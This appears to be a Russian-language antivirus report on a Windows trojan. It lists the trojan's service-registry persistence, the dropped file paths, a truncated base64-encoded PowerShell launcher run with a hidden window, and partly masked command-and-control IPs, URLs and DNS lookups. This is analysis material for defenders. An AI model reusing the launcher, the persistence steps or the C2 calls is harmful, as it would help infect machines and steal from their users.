Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\networkexplorer] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\networkexplorer] 'ImagePath' = '"%WINDIR%\SysWOW64\PortableDeviceWMDRM\networkexplorer.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9AC...
- %HOMEPATH%\545.exe
- %WINDIR%\syswow64\portabledevicewmdrm\networkexplorer.exe
- %HOMEPATH%\545.exe в %WINDIR%\syswow64\portabledevicewmdrm\networkexplorer.exe
- '24.##9.135.121':80
- '18#.#4.252.13':443
- http://jk##rew.com/cgi-bin/KhSO16ZAAf/
- http://jm######apingservice.com/content/fhGAfKs/
- http://18#.##.252.13:443/B9g9ZT6/t05UstD4jLJ/2vdlYTJbfS5Qw9Y4flu/har5t/ via 18#.#4.252.13
- DNS ASK jk##rew.com
- DNS ASK jm######apingservice.com
- '%HOMEPATH%\545.exe'
- '%WINDIR%\syswow64\portabledevicewmdrm\networkexplorer.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9AC...' (со скрытым окном)